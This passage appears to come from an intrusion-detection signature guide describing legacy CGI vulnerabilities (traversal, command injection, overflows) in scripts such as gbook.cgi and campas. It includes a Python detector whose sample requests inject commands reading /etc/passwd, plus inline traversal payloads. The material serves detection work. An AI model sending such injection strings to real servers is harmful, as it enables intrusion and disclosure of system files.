Signature Description: NetWin DNews is news server software that gives users fast access to Internet newsgroups; running a local news server also gives an organization complete control to create its own private or public discussion forums. NetWin DNews 5.3 is vulnerable: a remote attacker who sends overly long arguments to the dnewsweb.cgi script (including but not limited to the "group", "cmd" and "utag" parameters) triggers a buffer overflow that can lead to remote execution of arbitrary code. Patches may be available at the vendor website.
Signature ID: 1093
IBM Net.Data document.d2w Path Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1110 Bugtraq: 2017
Signature Description: IBM Net.Data is a scripting language used to create web applications; it supports a wide range of language environments and is compatible with most recognized databases. Net.Data 7.0 reveals server information: requesting a specially crafted URL by way of the document.d2w CGI application, comprising an invalid request and a known database, reveals the physical path of server files. Successful exploitation could assist further attacks against the victim host.
Signature ID: 1094
Matt Wright's download.cgi Remote Command Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1377 CVE-2002-0749 Bugtraq: 4579 Nessus: 11748
Signature Description: Matt Wright's Script Archive is a collection of CGI scripts written in Perl; it includes a file download script that keeps track of the number of downloads of specific files. download.cgi 1.0 contains a directory traversal vulnerability: the script does not properly validate the "f" parameter, so a remote attacker can send a specially crafted URL in which the "f" value contains "../" sequences and thereby view files outside the intended directory on the server.
Signature ID: 1095
Extropia WebStore Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1005 Bugtraq: 1774
Signature Description: WebStore is the culmination of eXtropia's experience with online shopping applications; it merges the Electronic Outlet HTML and Database versions and adds routines for error handling, order processing, encrypted mailing, frames, JavaScript and VBScript. eXtropia WebStore 1.0 and 2.0 are vulnerable: web_store.cgi does not properly validate the $file_extension variable when a null character is used, so a remote attacker can send a specially crafted URL whose 'page' parameter contains '../' sequences followed by a null byte and read files outside the intended directory. Patches are available at the vendor website.
Signature ID: 1096
Webmin edit_action.cgi based Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1196 CVE-2002-0749 Bugtraq: 3698,4579 Nessus: 11748
Signature Description: Webmin is a web-based system configuration tool for OpenSolaris, Linux and other Unix-based systems. With it an administrator can configure many operating system internals, such as users, disk quotas, services and configuration files, and modify and control many open source applications. Webmin is largely written in Perl and runs as its own process and web server. Webmin 0.91 does not properly validate '../' sequences in web requests, so directory traversal is possible: a remote attacker can use such sequences in an argument sent to the edit_action.cgi script to view hidden files on the server or to execute programs to which Webmin has privileges. No remedy was available as of August 2008.
Signature ID: 1097
EMU Webmail emumail.cgi Script Injection Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1526 Bugtraq: 5824
Signature Description: EMUMail is an open source web mail application available for Unix, Linux and Microsoft Windows. EMUMail 5.0 and 5.1 for Windows, for Unix and for Red Hat Linux do not properly validate user input in the request URL. An attacker can pass an email containing script or HTML code through the EMUMail web mail interface, and the script code executes in the security context of the EMUMail site when the message is viewed. An updated version may be available at the vendor website.
Signature ID: 1098
Sambar Server environ.pl Cross-site Scripting Vulnerability
Threat Level: Information
Bugtraq: 7209
Signature Description: Sambar Server is a multi-threaded, extensible application server. Sambar Server 5.3 and earlier contain a cross-site scripting vulnerability in environ.pl. This rule triggers when an attacker sends a specially crafted URL request to environ.pl; the vulnerability could be used to steal a victim's cookie-based authentication credentials. No remedy was available as of September 2008.
Signature ID: 1099
Environ.cgi access Vulnerability
Threat Level: Information
Signature Description: This rule detects a request for environ.cgi. This CGI script is commonly requested in vulnerability scans, and an attacker can use it to gather system configuration information such as the server's CGI environment variables.
Signature ID: 1100
Everythingform.cgi Arbitrary Command Execution Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0023 CVE-2002-0749 Bugtraq: 2101,4579 Nessus: 11748
Signature Description: Leif M. Wright's everythingform.cgi, a Perl script that processes multiple forms, contains a parsing vulnerability in its hidden "config" field that enables an attacker to run arbitrary shell commands in the security context of the web server. For example, an attacker can post a value such as ../../../../../bin/ping in the "config" parameter to everythingform.cgi to run the ping command in the context of the web server, and in the same way can run any other command. everythingform.cgi 2.0 is prone to this vulnerability.
Signature ID: 1101
EZNE.NET Ezboard 2000 Remote Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0263 CVE-2002-0749 Bugtraq: 4068,4579 Nessus: 11748
Signature Description: EZNE.net Ezboard 2000 is a CGI-based web bulletin board. In Ezboard 1.27 the 'ezadmin.cgi' script allows a remote attacker to craft an HTTP request that causes a buffer overflow on the web server and overwrites memory with data included in the URL. As in many CGI programs, user-supplied data is written to a statically sized array; when the attacker sends more data than the declared array size, the overflow overwrites adjacent stack memory, and if return pointers are overwritten, arbitrary code may be executed as the vulnerable process.
Signature ID: 1102
EZNE.NET Ezboard 2000 Remote Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0263 CVE-2002-0749 Bugtraq: 4068,4579 Nessus: 11748
Signature Description: EZNE.net Ezboard 2000 is a CGI-based web bulletin board. In Ezboard 1.27 the 'ezboard.cgi' script allows a remote attacker to craft an HTTP request that causes a buffer overflow on the web server and overwrites memory with data included in the URL. As in many CGI programs, user-supplied data is written to a statically sized array; when the attacker sends more data than the declared array size, the overflow overwrites adjacent stack memory, and if return pointers are overwritten, arbitrary code may be executed as the vulnerable process.
Signature ID: 1103
EZNE.NET Ezboard 2000 Remote Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0263 CVE-2002-0749 Bugtraq: 4068,4579 Nessus: 11748
Signature Description: EZNE.net Ezboard 2000 is a CGI-based web bulletin board. In Ezboard 1.27 the 'ezman.cgi' script allows a remote attacker to craft an HTTP request that causes a buffer overflow on the web server and overwrites memory with data included in the URL. As in many CGI programs, user-supplied data is written to a statically sized array; when the attacker sends more data than the declared array size, the overflow overwrites adjacent stack memory, and if return pointers are overwritten, arbitrary code may be executed as the vulnerable process.
Signature ID: 1104
FAQManager.CGI NULL Character Arbitrary File Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0380 Bugtraq: 3810,1154 Nessus: 10387,10837
Signature Description: FAQManager.cgi is a Perl script that maintains a FAQ (Frequently Asked Questions) via a web interface; it runs on most Unix/Linux and Microsoft Windows platforms. FAQManager does not properly validate certain input in incoming requests: it is possible to append a NULL character (%00) to a web request and display the contents of an arbitrary web-readable file. FAQManager.cgi 2.2.5 and earlier are vulnerable. Patches are available at the vendor website.
Signature ID: 1105
LakeWeb Filemail CGI script remote arbitrary code execution vulnerability
Threat Level: Information
Industry ID: CVE-1999-1154
Signature Description: FileSeek.cgi is an example script from "The CGI/Perl Cookbook" that locates and downloads files on a web server. It contains two vulnerabilities due to erroneous parsing: an attacker could use "....//" in the HEAD or FOOT parameter of an HTTP request to fileseek.cgi to view arbitrary files on the server, or could use a similar method to execute shell commands on the web server.
Signature ID: 1106
FileSeek CGI Script File Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0611 CVE-2002-0749 Bugtraq: 4579,6784 Nessus: 11748
Signature Description: FileSeek.cgi is an example script that locates and downloads files on a web server. Wiley Computer Publishing / Craig Patchett FileSeek.cgi and FileSeek2.cgi do not properly validate user input to their parameters: a remote attacker can send an HTTP request with "../" or "..//" sequences in the HEAD or FOOT parameter of fileseek.cgi to view arbitrary files on the server, or could use a similar method to execute shell commands on the web server. Apply the patch for this vulnerability listed in the DSINet advisory.
Signature ID: 1107
Flexform access Vulnerability
Threat Level: Information
Signature Description: Flexform is middleware available on OpenVMS that produces documents directly from OpenVMS applications (OpenVMS, the Virtual Memory System, is a multi-user, multiprocessing, virtual-memory operating system designed for time sharing, batch, real-time and transaction processing). This rule triggers when a request accesses the flexform CGI program; successful exploitation can allow an attacker to read arbitrary files on the system.
Signature ID: 1108
Faq-O-Matic Form.cgi access vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0230 CVE-2002-0749 Bugtraq: 4565,4579 Nessus: 11748
Signature Description: Faq-O-Matic is a product for managing a collection of FAQs; it lets visitors to the site maintain the FAQ by adding new questions and answers. Jon Howell Faq-O-Matic 2.711 and 2.712 are vulnerable to cross-site scripting: an attacker can craft a URL with malicious script code in the "cmd" argument, and if a legitimate user follows the URL, the code executes in that user's browser in the security context of the Faq-O-Matic site.
Signature ID: 1109
Formmail Environmental Variables Disclosure Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0411 CVE-1999-0172 Bugtraq: 1187,2079 Nessus: 10076,10782
Signature Description: An unauthorized remote user can obtain CGI environment variable information from a web server running Matt Wright FormMail by requesting a specially formed URL that specifies the email address to which the details are sent. The URL names particular CGI environment variables, such as PATH, DOCUMENT_ROOT or SERVER_PORT, and FormMail emails their values to the given address. The information obtained could be used to assist a future attack. Versions 1.6, 1.7 and 1.8 of Matt Wright FormMail are prone to this vulnerability.
Signature ID: 1110
Gbook.cgi Remote Command Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1131 Bugtraq: 1940
Signature Description: Bill Kendrick GBook.cgi 1.0 does not properly validate user-supplied input to the script's _MAILTO parameter. This allows a remote attacker to append a ';' character to the _MAILTO value, followed by text containing shell commands. The commands are executed as the web server user, giving the attacker the ability to execute arbitrary code on the web server and a foothold for more serious compromise of the host.
Signature ID: 1111
Getdoc.cgi access vulnerability
Threat Level: Information
Industry ID: CVE-2000-0288 CVE-2002-0749 Bugtraq: 4579 Nessus: 11748
Signature Description: Infonautics provides online access to research materials and uses getdoc.cgi to manage the document purchase and viewing process. A malicious user could alter the content of getdoc.cgi links in order to bypass the payment page and freely view documents that would normally require payment.
Signature ID: 1112
NetBSD global global.cgi remote commands execute vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0952 CVE-2002-0749 Bugtraq: 4579 Nessus: 11748
Signature Description: The Global CGI interface (global.cgi) in the NetBSD ports package of Tama Communications Corporation's GLOBAL 3.55 and earlier does not properly validate quoted and escaped characters. By sending specially crafted input containing shell metacharacters to the CGI interface, a remote attacker can execute shell commands on the system in the security context of the web server. Upgrade to GLOBAL 4.0.1 or newer; patches are available at the vendor website.
Signature ID: 1113
Linksys Routers Gozila.CGI Denial Of Service Vulnerability
Threat Level: Warning
Bugtraq: 10453 Nessus: 11773
Signature Description: The Linksys EtherFast BEFSRU31 cable/DSL router connects multiple PCs to a high-speed broadband Internet connection or to an Ethernet backbone. Configured as a DHCP server, it acts as the only externally recognized Internet device on the local area network (LAN), and it can also be configured to block internal users' access to the Internet. BEFSRU31 firmware 1.44 and earlier are vulnerable: the gozila.cgi script does not properly validate the parameter values passed to it, and a specially crafted request from a remote attacker drives the CPU to full utilization so that the device stops servicing requests, a denial of service.
Signature ID: 1114
CGIScript.NET csMailto Hidden Form Field Remote Command Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0180 CVE-2002-0749 Bugtraq: 4579 Nessus: 11748
Signature Description: Lars Ellingsen's Guestserver is a comprehensive guestbook system with many configurable features: a user-defined form, view and preview pages, user-defined HTML between entries, email notification, a thank-you email to each guest, anti-spam checks, reverse-order listing, configurable time format, a limit on the number of messages shown, language files, HTML-tag stripping, optional pictures, a bad-words filter and duplicate-message checking. Guestserver 4.12 and earlier are vulnerable: a remote attacker can send a request to guestserver.cgi whose email value contains executable code within pipe characters (|) in front of an email address. The pipe metacharacter is not properly validated, so the code placed in the email value is executed in the security context of the web server.
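The command-execution signatures in this group (1077 bslist.cgi, 1079/1080 calender.pl and calender_admin.pl, 1081 campas, 1091 dfire.cgi, 1110 gbook.cgi, 1112 global.cgi and 1114 guestserver.cgi) all look for the same thing: a shell metacharacter (';', '|' or a %0a linefeed) arriving in a parameter that the script hands to a shell. The Python below is an added example written for this guide, not HP signature code and not any vendor's script; it runs that check over a few constructed request lines and shows why the check has to decode to a fixed point before matching. The parameter name `configfile` for the calendar scripts is assumed (the guide only says "configuration file" field), as are the watched-parameter table and the backtick and `$(` entries in the metacharacter list.

```python
"""Added example: detect shell-metacharacter injection in CGI query strings.

Mirrors the check the reference guide's command-execution signatures make.
The request lines below are constructed for the example, not captures.
"""
from urllib.parse import urlsplit, parse_qsl, unquote

# Script -> parameters to inspect.  None means every parameter, which is
# what the guide describes for campas (the whole query is the command).
# 'configfile' is an assumed name for the calendar "configuration file" field.
WATCHED = {
    "bslist.cgi": None,                    # sig 1077, ';'
    "calender.pl": {"configfile"},         # sig 1079, '|cmd|' via open()
    "calender_admin.pl": {"configfile"},   # sig 1080
    "campas": None,                        # sig 1081, %0a separators
    "dfire.cgi": None,                     # sig 1091, '|'
    "gbook.cgi": {"_MAILTO"},              # sig 1110, ';'
    "global.cgi": None,                    # sig 1112
    "guestserver.cgi": {"email"},          # sig 1114, '|cmd|' in email
}

# Metacharacters the guide names (';', '|', linefeed) plus backtick and
# "$(" as an added assumption: they reach a shell the same way.
METACHARS = (";", "|", "\n", "`", "$(")


def decode_fixpoint(value: str) -> str:
    """Percent-decode until nothing changes, so %257C (double-encoded '|')
    is seen as '|' just as a second decoding layer in the target would."""
    previous = None
    while previous != value:
        previous, value = value, unquote(value)
    return value


def inspect(request_line: str):
    """Return (script, parameter, metacharacter) for a matching request,
    or None when the request is for another script or carries no metachar."""
    _method, target, *_ = request_line.split()
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in WATCHED:
        return None
    watched = WATCHED[script]
    # parse_qsl already decodes one layer; decode again to a fixed point.
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        if watched is not None and name not in watched:
            continue
        # campas-style requests carry the payload in the "name" position
        # (there is no '='), so inspect both halves of each pair.
        for text in (decode_fixpoint(name), decode_fixpoint(raw)):
            for meta in METACHARS:
                if meta in text:
                    return (script, name, meta)
    return None


def scan(request_lines):
    """Apply inspect() to a batch and keep only the hits."""
    return [(line, hit) for line in request_lines if (hit := inspect(line))]


# Constructed sample traffic: three attacks, two benign requests.
SAMPLE = [
    "GET /cgi-bin/calender.pl?configfile=%7Ccat%20/etc/passwd%7C HTTP/1.0",
    "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a HTTP/1.0",
    "GET /cgi-bin/gbook.cgi?_MAILTO=a%40example.com%3Bid&name=Bob HTTP/1.0",
    "GET /cgi-bin/gbook.cgi?_MAILTO=a%40example.com&name=Bob HTTP/1.0",
    "GET /index.html?q=a%7Cb HTTP/1.0",
]

if __name__ == "__main__":
    for line, (script, param, meta) in scan(SAMPLE):
        print(f"ALERT {script} param={param!r} metachar={meta!r}: {line}")
```

The pipe in the benign `/index.html` request is ignored because only the scripts in the table pass their input to a shell; restricting the match to those scripts and, where the guide names one, to the specific parameter is what keeps the rule from firing on every URL that happens to contain a ';'.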
Signature ID: 1115
BizDesign ImageFolio.cgi access vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1334 CVE-2002-0749 Bugtraq: 6265,4579 Nessus: 11748
Signature Description: ImageFolio is an image catalog and e-commerce package with a multi-user, browser-based administration area, unlimited hierarchical categories and subcategories, a shopping cart, customer and order databases, SSL support for secure checkout and payment processing. It can sell stock photography, tangible products, services, photographic prints, digital downloads, software and documents, with full control over pricing, shipping, taxation, transaction options and the look and feel of the store. BizDesign ImageFolio 3.01 does not properly validate user input to the imageFolio.cgi script, allowing cross-site scripting: a remote attacker can craft a URL to the script that, when followed by a legitimate user, runs script code in that user's browser in the security context of the ImageFolio site. In this way the attacker can obtain the user's session cookie and pose as that user for the duration of the session.
Signature ID: 1120
Ntdll.dll Buffer Overflow Vulnerability
Threat Level: Information
Industry ID: CVE-2003-0109 Bugtraq: 7116 Nessus: 11413,11412
Signature Description: For IIS, WebDAV does not limit the length of the file name being requested. When processing
a WebDAV-based request, whether the method used is PROPFIND, LOCK, SEARCH, or even GET with a "translate:f" header,
the request is passed to a series of functions, one of these being GetFileAttributesExW. Under the hood of
GetFileAttributesExW is a call to the RtlDosPathName_U function exported by ntdll.dll. This is where the actual
vulnerability lies. IIS 5.0 is prone to this vulnerability.
Signature ID: 1121
Last Lines CGI Script Directory Traversal Vulnerability
Threat Level: Information
Industry ID: CVE-2001-1205 Bugtraq: 3754
Signature Description: Last Lines CGI is a freely available script written in Perl and maintained by the Matrix's CGI
Vault. Lastlines.cgi is prone to directory traversal attacks. It is possible for a remote attacker to submit a maliciously
crafted web request which is capable of breaking out of wwwroot and browsing arbitrary web-readable files on a host
running the vulnerable script. The affected version of Last Lines is 2.0.
Signature ID: 1122
WEB-CGI loadpage.cgi access vulnerability
Threat Level: Information
Industry ID: CVE-2000-1092 CVE-2000-0188 Bugtraq: 2109,1014 Nessus: 10065
Signature Description: Loadpage.cgi CGI program in EZshopper 3.0 and 2.0 allows remote attackers to list and read
files in the EZshopper data directory by inserting a "/" in front of the target filename in the "file" parameter.
Signature ID: 1123
WEB-CGI mailfile.cgi access vulnerability
Threat Level: Information
Industry ID: CVE-2000-0977 Bugtraq: 1807
Signature Description: OatMeal Studios' Mail-File is a CGI application that allows sending certain files to user-specified
email addresses via a web interface. A vulnerability exists in this script that can be used to send the contents of any
readable user-specified file to an email address. The web interface provides the user with the option to select files to
send that have been pre-configured in the script. The values of the form variables associated with each "pre-configured
file" are the actual filenames that are used when opening the files. As a result, the user can manipulate the filename
value so that the script will, instead of opening one of the "normal" options, open whatever has been specified as the
filename (e.g. "../../../../../../../../../etc/passwd"). If exploited, an attacker can read arbitrary files on the filesystem
with the privileges of the web server. This may lead to further compromise. Oatmeal Studios Mail File 1.10 is prone to
this vulnerability.
Signature ID: 1124
WEB-CGI maillist.pl access Vulnerability
Threat Level: Information
Signature Description: Maillist allows people to send e-mail to one address, whereupon their message is copied and
sent to all of the other subscribers to the maillist. This rule triggers when an attacker accesses the maillist.pl script.
Successful exploitation can allow an attacker to execute arbitrary commands via shell metacharacters in the email
address.
Signature ID: 1125
3R Soft MailStudio mailview.cgi access vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0526 CVE-2000-0527 CVE-2002-0749 Bugtraq: 1335,4579 Nessus: 11748
Signature Description: 3R Soft's Mail Server provides an industry-leading combination of reliability, scalability and
enterprise features for service providers and corporations. It supports integrated POP, IMAP, Web and wireless mail, and
personal information management (PIM). 3R Soft MailStudio 2000 2.0 is a vulnerable version. A malicious user (remote
attacker) could send a specially crafted URL request to the mailview.cgi script containing "dot dot" sequences (/../) in
the argument as a parameter value to traverse directories and view arbitrary files on the Web server. The script does not
properly validate the user-supplied input in the received request, so it is possible to read portions of arbitrary files,
thereby compromising the confidentiality of other users' email and passwords, as well as other configuration and
password files on the system.
Signature ID: 1126
WEB-CGI man.sh access vulnerability
Threat Level: Information
Industry ID: CVE-1999-1179
Signature Description: A vulnerability in the man.sh CGI script, included in the May 1998 issue of SysAdmin Magazine,
allows remote attackers to execute arbitrary commands. An attacker can access an authentication mechanism and supply
his/her own credentials to gain access. Alternatively, the attacker can exploit weaknesses to gain access as the
administrator by supplying input of their choosing to the underlying CGI script. On success the attacker gains admin
access on the affected system.
Signature ID: 1127
Ministats admin access
Threat Level: Warning
Signature Description: Ministats is a Web site traffic analyzer which logs visits to any of your web pages by placing a
simple, invisible tag. It also allows you to log referrals as well as total hits. This event is generated when an attempt is
made to gain unauthorized access to a web server or an application running on a web server. Some applications do not
perform stringent checks when validating the credentials of a client host connecting to the services offered on a host
server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored
on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited
by the attacker.
Signature ID: 1129
MRTG CGI Arbitrary File Display Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0232 Bugtraq: 4017 Nessus: 11001
Signature Description: The mrtg.cgi script is part of the MRTG traffic visualization application. MRTG Multi Router
Traffic Grapher CGI 2.9.17-win32 and MRTG Multi Router Traffic Grapher CGI 2.9.17-unix are vulnerable. A
malicious user (remote attacker) could send a specially crafted URL request to the mrtg.cgi script, this request
containing "dot dot" sequences (/../) in the argument to the 'cfg=' parameter to traverse directories and view arbitrary
files on the Web server. The script does not properly validate the user-supplied input in the received request, so it is
possible to read portions of arbitrary files.
Signature ID: 1130
WEB-CGI newdesk access Vulnerability
Threat Level: Information
Signature Description: The NEWDESK.INF file holds all of the desktop configuration. This rule triggers when an
attacker accesses the 'newdesk' file. Successful exploitation can allow an attacker to gain sensitive information such as
user names and passwords.
Signature ID: 1131
WEB-CGI nsManager.cgi access vulnerability
Threat Level: Warning
Industry ID: CVE-2000-1023 CVE-2002-0749 Bugtraq: 1710,4579 Nessus: 11748
Signature Description: The Alabanza End User Control Panel versions 3.0 and earlier could allow a remote attacker to
gain access to the interface to manipulate domain names and Domain Name System information. Access to the Control
Panel which handles administrative controls for domains associated with Alabanza does not require a username and
password if specially crafted URLs are requested.
Signature ID: 1132
WEB-CGI perlshop.cgi access vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1374
Signature Description: Perlshop.cgi shopping cart program stores sensitive customer information in directories and
files that are under the web root, which allows remote attackers to obtain that information via an HTTP request.
Signature ID: 1133
WEB-CGI pfdisplay.cgi access vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0270 Bugtraq: 64 Nessus: 10174
Signature Description: The pfdisplay CGI program for SGI's Performer API Search Tool allows read access to files. SGI
IRIX 6.4, SGI IRIX 6.3 and SGI IRIX 6.2 are prone to this vulnerability. The issue is triggered when a malicious attacker
uses the IRIS Performer API Search Tool (pfdisplay) to access files, which will disclose any files.
Signature ID: 1134
WEB-CGI post-query access vulnerability
Threat Level: Information
Industry ID: CVE-2001-0291 Bugtraq: 6752
Signature Description: NCSA Post-query is prone to a remotely exploitable buffer overflow condition. This is due to
insufficient bounds checking when handling HTTP POST requests. It is possible for remote attackers to corrupt
sensitive regions of memory with attacker-supplied values, possibly resulting in execution of arbitrary code. NCSA
post-query 1.0 is prone to this vulnerability. By sending 1000 bogus entries to the affected system and the 1001st one as a
specially crafted packet, the attacker gains access to the affected system.
Signature ID: 1135
Ipswitch IMail Server Mailbox Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1283 Bugtraq: 3427
Signature Description: Ipswitch IMail is an email server that serves clients their mail via a web interface. IMail
supports most common email protocols such as SMTP, POP3, IMAP4, LDAP, etc. Ipswitch IMail 7.0.4 is a version
vulnerable to a denial of service. A remote attacker could send an invalid mail whose name is too long, i.e., one that
contains 248+ dots ('.'); after such a mail is received and copied to the mailbox, the web interface will crash. Once the
interface crashes it must be restarted to regain normal functionality. This signature checks for attacks on the
printmail CGI.
Signature ID: 1136
Ipswitch IMail Server Mailbox Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1283 CVE-2002-0749 Bugtraq: 3427,4579 Nessus: 11748
Signature Description: Ipswitch IMail is an email server that serves clients their mail via a web interface. IMail
supports most common email protocols such as SMTP, POP3, IMAP4, LDAP, etc. Ipswitch IMail 7.0.4 is a version
vulnerable to a denial of service. A remote attacker could send an invalid mail whose name is too long, i.e., one that
contains 248+ dots ('.'); after such a mail is received and copied to the mailbox, the web interface will crash. Once the
interface crashes it must be restarted to regain normal functionality. This signature checks for attacks on the
readmail CGI.
Signature ID: 1137
Ikonboard Arbitrary Command Execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0076 Bugtraq: 2157
Signature Description: Ikonboard is a free forum system. Similar to UBB and UB, Ikonboard was written in Perl.
Jarvis Entertainment Group Ikonboard 2.1.7b and prior versions are vulnerable. A remote attacker could send a URL
request that sets the $SEND_MAIL variable in the URL; when this request is sent to the register.cgi script, it is possible to
specify the binary to execute as the httpd userid, and then register to execute the program. The script does not properly
validate the user-supplied input in such requests, so this design flaw makes it possible for a user with malicious intent
to gain local access to a system running Ikonboard.
Signature ID: 1138
John O'Fallon 'responder.cgi' DoS Vulnerability
Threat Level: Warning
Bugtraq: 3155
Signature Description: John O'Fallon's 'responder.cgi' is a free CGI shell script, written in C, for MacHTTP Server and
other MacOS web server products. John O'Fallon Responder.cgi version 1.0 is vulnerable to a denial of service: a
malicious user (remote attacker) could send HTTP GET requests with an excessive number of characters, which will cause
the server to freeze. Because the MacHTTP web server does not perform proper bounds checking in the 'responder.cgi'
script on such requests, it is possible to cause a denial of service against the MacHTTP web server. The web server will
need to be restarted to regain normal functionality.
Signature ID: 1139
Webcom Datakommunikation CGI Guestbook rguest Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0287 CVE-1999-0467 Bugtraq: 2024
Signature Description: The WebCOM Network is a collection of states (Departments), Districts, and Posts internet
communications and information sites that are under one umbrella organization for format. Like going into a
nationwide grocery store, you know where items will be from store to store. WebCom Datakommunikation Guestbook 0.1 is
a vulnerable version. A malicious user (remote attacker) could send a specially crafted request to rguest.exe, specifying
the path and filename in the parameter "template". The program does not properly validate the received request, so this
request can retrieve the contents of arbitrary files to which the web server has access.
Signature ID: 1140
WEB-CGI rksh access vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0509
Signature Description: The rksh command invokes a restricted version of the Korn shell. Many sites that maintain a
Web server support CGI programs. Often these programs are scripts that are run by general-purpose interpreters, such
as /bin/sh or PERL. If the interpreters are located in the CGI bin directory along with the associated scripts, intruders
can access the interpreters directly and arrange to execute arbitrary commands on the Web server system.
Signature ID: 1141
WEB-CGI nlog rpc-nlog.pl access vulnerability
Threat Level: Information
Industry ID: CVE-1999-1278
Signature Description: Nlog is a package of scripts designed to correlate and analyze output from the nmap 2.0 port
scanning software. A vulnerability in versions of Nlog up to 1.1b could allow a remote attacker to execute certain
commands on the system as the user running the server process, usually "nobody." The attacker is limited to running
commands in uppercase, which limits the scope of this vulnerability.
Signature ID: 1142
Nlog rpc-smb.pl script allows some arbitrary commands vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1278
Signature Description: NLog is a set of PERL scripts for managing and analyzing nmap 2.0+ log files. It allows you to
keep all of your scan logs in a single searchable database. The CGI interface for viewing scanned logs is completely
customizable and easy to modify and improve. The core CGI script allows you to add your own extension scripts for
different services, so all hosts with a certain service running will have a hyperlink to the extension script. The Common
Gateway Interface (CGI) scripts of nLog 1.1a and prior versions are vulnerable: they do not properly validate shell
metacharacters in the IP address argument, which could allow remote attackers to execute certain commands via
nlog-smb.pl.
Signature ID: 1143
WEB-CGI rsh access Vulnerability
Threat Level: Information
Industry ID: CVE-1999-0509
Signature Description: The rsh package contains a set of programs which allow users to run commands on remote
machines, log in to other machines, and copy files between machines. This rule triggers when an attacker accesses rsh.
Successful exploitation can allow an attacker to execute arbitrary commands on the web server.
Signature ID: 1144
WEB-CGI rwwwshell.pl access Vulnerability
Threat Level: Information
Signature Description: RWWWShell is a Perl program accompanying the paper "Placing Backdoors through Firewalls". It
allows communicating with a shell through firewalls and proxy servers by imitating web traffic. This rule triggers when
an attacker accesses the rwwwshell.pl CGI script. Successful exploitation can allow an attacker to obtain a shell on the
web server.
Signature ID: 1145
Apache Artificially Long Slash Path Directory Listing and ScriptAlias Source Retrieval Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0236 CVE-2001-0925 Bugtraq: 2300,2503
Signature Description: Some applications do not perform stringent checks when parsing the URL, resulting in disclosure
of sensitive information or a denial of service. Apache HTTP Server prior to 1.3.19 for Linux allows a directory listing
on the Web server when a remote attacker sends multiple slashes in an HTTP request. NCSA httpd prior to and
including 1.5 and Apache Web Server prior to 1.0 also give a full listing of the CGI-BIN directory if indexing is turned on
and an HTTP request with multiple slashes is sent. This may allow an attacker to audit scripts for vulnerabilities,
retrieve proprietary information, etc. Upgrade to a newer version of the product.
Signature ID: 1146
Rod Clark Sendform.CGI Blurb File Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0710 Bugtraq: 5286
Signature Description: The sendform.cgi script can mail the information that a user enters on an HTML form. It can also
send the user a copy of the data entered on the form, and can send optional related files that are defined for each form.
Rod Clark sendform.cgi versions 1.4.4, 1.4.3, 1.4.2, 1.4.1 and 1.4 are vulnerable. A vulnerability has been reported for
sendform.cgi which may disclose arbitrary files to remote attackers. The script has an optional feature to send 'blurb
files' to the email addresses that are provided on the web form. However, sendform.cgi does not properly validate the
'BlurbFilePath' parameter. Thus it is possible for a remote attacker to modify the value of the BlurbFilePath parameter
and obtain access to arbitrary files.
Signature ID: 1147
WEB-CGI sendmessage.cgi access vulnerability
Threat Level: Information
Industry ID: CVE-2001-1100 Bugtraq: 3673
Signature Description: Sendmessage.cgi in W3Mail 1.0.2, and possibly other CGI programs, allows remote attackers to
execute arbitrary commands via shell metacharacters in any field of the 'Compose Message' page.
Signature ID: 1149
WEB-CGI setpasswd.cgi access vulnerability
Threat Level: Information
Industry ID: CVE-2001-0133 CVE-2002-0749 Bugtraq: 2212,4579 Nessus: 11748
Signature Description: The web administration interface for InterScan VirusWall 3.6.x and earlier does not use
encryption, which could allow remote attackers to sniff the administrator password via the setpasswd.cgi program or
other HTTP GET requests that contain base64-encoded usernames and passwords. setpasswd.cgi is used to modify
passwords: the admin or user requests setpasswd.cgi with the parameter OPASS specifying the old password and the PASS2
and PASS3 parameters specifying the new password, and setpasswd.cgi replaces the old password with the new one. This
request is sent in clear (plain text) form. If any worm or virus monitors it, it can send the admin/user information to
the attacker, who then gains full access to the affected system.
Signature ID: 1150
WEB-CGI shopping cart directory traversal vulnerability
Threat Level: Information
Industry ID: CVE-2000-0921 Bugtraq: 1777
Signature Description: A directory traversal vulnerability in the Hassan Consulting shop.cgi shopping cart program
allows remote attackers to read arbitrary files via a directory traversal attack (../, dot dot slash) in the page parameter.
Hassan Consulting Shopping Cart 1.18 is prone to this vulnerability. Because of this vulnerability an attacker can read all
the pages of the affected web site.
Signature ID: 1152
WEB-CGI simplestmail.cgi access vulnerability
Threat Level: Information
Industry ID: CVE-2001-0022 CVE-2002-0749 Bugtraq: 2106,4579 Nessus: 11748
Signature Description: A vulnerability exists in Leif M. Wright's simplestmail.cgi, a script designed to coordinate
guestbook submissions from website visitors. An insecure call to the open() function leads to a failure to properly filter
shell metacharacters from user-supplied input. As a result, it is possible for an attacker to cause this script to execute
